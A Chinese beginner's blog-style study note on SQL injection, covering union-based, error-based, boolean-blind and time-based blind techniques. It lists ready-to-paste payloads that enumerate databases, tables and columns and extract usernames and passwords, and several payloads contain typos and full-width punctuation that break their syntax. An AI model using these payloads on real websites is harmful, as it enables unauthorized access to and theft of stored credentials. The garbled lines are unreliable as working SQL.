浅析web安全之sql注入基础

本人萌新，刚开始接触安全领域，刚学了sql注入方面内容，来写一点个人总结以后梦里日站的时候可以复习看看

我的老师在开始安全技术培训的时候说的第一句话，就是当一个黑客，不仅需要很强的学习时间的能力，更主要的是对于某一个方面的想象力的挖掘，通过开拓性和发散性思维才能够从一堵密不透风的墙中间找到一个小小的空隙，从而像一滴人畜无害的雨水一样，渗透进去，获得你想要的东西。（扯远了）

什么是sql注入？

百度百科是这样解释的：所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。

个人浅显的总结，就是你在web上的每一次交互行为（登录，查看或跳转页面等等），都会间接的与后台服务器进行数据的交互（一般通过后端语言如php和java），会用到各式各样的数据库查询语句（增删改查）；而sql注入则是通过在预期的行为内输入超预期的sql语句，导致原语句的结构破坏或报错，篡改，从而执行注入者所期望的行为。

言简意赅的说，把数据变成程序，查询变成执行；就是不按常理出牌，俗称乱拳打死老师傅

几种主流的sql注入技术浅析

——注入方法向下兼容，执行力越来越高

1.若是能观察到显示位和返回数据，即可使用手工id注入的方法

1.寻找注入点，构造闭合    url?id=1 所猜闭合 and 1=2 --+

若猜错则web无执行该语句，显示正常页面；猜对，则web执行该语句，出现预期外的结果

2.查看当前表总共有多少列 url?id=1 order by 所猜测的数字 --+

2.寻找显示位 url?id=-1’ union all select 1,2,3 --+

3.定位该网页所选用数据库 database()当前数据库  version() 数据库版本号

4.通过数据库查找web所用表  url?id=-1’ union all select 1,table_name,3 from information_schema.tables where table_schema=’当前数据库’ --+

5.通过已知数据库和表名查找该表内所有列名 url?id=-1’ union all select 1,column_name,3 from information_schema.columns where table_schema=’当前数据库’ and table_name=’当前表名’ --+

6.最后一只数据库，表名，列名后，直接查询数据库中的用户名和密码  

url?id=-1 union all select 1,用户名,密码 from 表名

 

2.若是web页面无显示位，也无可惜那时数据，仍然有sql报错通知显示，即可使用报错型sql注入

以下代码摘自Firefox插件Max HackBar

报错型sql注入上述sql注入的前三步是一致的，但没有数据的回显位，也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上，我们可以利用这点来构造报错显示sql语句。下边是利用 `count（*）， FLOOR(RAND(0)*2，group by `报错。

前几部步骤一致，寻找到注入点后在植入点直接复制该段代码即可

查看database版本

 OR 1 GROUP BY CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2)) HAVING MIN(0) OR 1

查看database

 AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

查看表

 AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(table_name AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=数据库名字 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

查看列

 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(column_name AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=表名 AND table_schema=数据库名 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

查看数据

 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(列名) AS CHAR),0x7e)) FROM 表名 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

在以上注入语句中，可以使用group_concat()函数进行一次多个查找

3.若是无显示位也无报错值，只能在页面上看到页面是否正确，这里就要使用布尔盲注blind injection了

啥是布尔？啥事盲注？

字面上，盲注就是瞎jb注入，看不见回显，只有1,和0

布尔值就是1,和0的值

布尔型是利用页面至少会呈现正确提交和错误提交俩种不同回馈，来构造sql语句逐个猜测数据库中内容。<br>例如：一个人不说话，如果你说对了他就点头，如果你说错了他就摇头。理解以下场景：<br>

菜鸟：“大佬，你是不姓张？”<br>

不说话的大佬：摇头ing<br>

菜鸟：“我知道了，大佬你姓赵是不是？”<br>

不说话的大佬：欣慰的点头ing<br>

菜鸟自语：“原来大佬姓赵啊” <br>

然后菜鸟开始了新一轮的猜测问答<br>

以上就是布尔型盲注的原理。<br>

布尔盲注使用以下基本sql函数：

Length（）//返回字符串的长度

     Length（abc）返回3，表示abc字符串长度为3

Substr（）//截取字符串

     Stbstr(abc,1,1) 返回a，从abc的第一位开始截，步长为1。

前几部过程一致，寻找注入点后即可开始注入

 构造判断语句

id =1 and 1=2

id =1’ and 1=2 --+

id =1“ and 1=2 --+

 

+ 构造暴库语句

id=1‘ and length(database())>1 --+ //增1这个数字大小来判断库名长度

id 1’ and ascii(substr(database(),1,1)) > 1 --+ //增加1这个数据来判断数据库名的第一个字母ascii值大小，参考码表

id=1‘ and ascii(substr((select table_name from information_schema.tables where table_schema='库名' limit 0,1），1，1））>1 --+ //表名

id =1‘ and ascii（substr（（select column_name from information_schema. columns where TABLE_name = 'your table' and table_schema = '库名' limit 0,1），1，1））  //列名

id=1‘ and ascii(substr((select ’列名‘ from '表名' limit 0,1），1，1）） //爆值

通过基本的逻辑运算和ASCII表，成功只问是与否就可获取我们所想要知道的信息

 

 

4.若是无显示为也无报错值，布尔盲注之后也无显示对与否，我们是不是就没有办法获取信息了呢？

密码学中有一种通信攻击方式叫做侧信道攻击

百度百科如下：

边信道攻击(side channel attack 简称SCA)，又称侧信道攻击:针对加密电子设备在运行过程中的时间消耗、功率消耗或电磁辐射之类的侧信道信息泄露而对加密设备进行攻击的方法被称为边信道攻击。这类新型攻击的有效性远高于密码分析的数学方法，因此给密码设备带来了严重的威胁。

我们这里使用的是被划重点的“时间消耗”间接的判断出服务器上是否执行该命令；

时间消耗需要用到以下函数

sleep()

括号中直接加入睡眠时间，你就可以睡这个服务器了，睡了服务器，服务器就到手了

通普通布尔盲注类似，不过加入了sleep()函数，通过服务器返回数据的时间来判断该命令是否被执行（网页是不是很明显的卡了一下）

实际环境中根据自身需求进行改写睡眠时间

 

+ 构造判断语句

id=1' and if(1=2,1, sleep(10)) --+

id=1" and if(1=2,1, sleep(10)) --+

id=1) and if(1=2,1, sleep(10)) --+

 

+ 构造暴库语句

id=1‘ and if((length(database()>1),sleep(4),0) --+ //增加1值来猜库名的长度

id 1’ and if（（ascii(substr(database(),1,1)) > 1），sleep(4),0 ）--+ //库名

id 1’ and if（（ascii(substr((select column_name   from information_schema. columns where TABLE_name = 'your table' and table_schema = 'your database'limit 0,1),1,1)) > 1），sleep(4),0 ）--+ //表名

 

 

原理都大同小异

 

 

最后共勉以下

 

真正的强者不会因为外界的干扰而忘记自己最初的选择

不要因为路途的遥远就忘记为什么而出发

————知乎用户：车小胖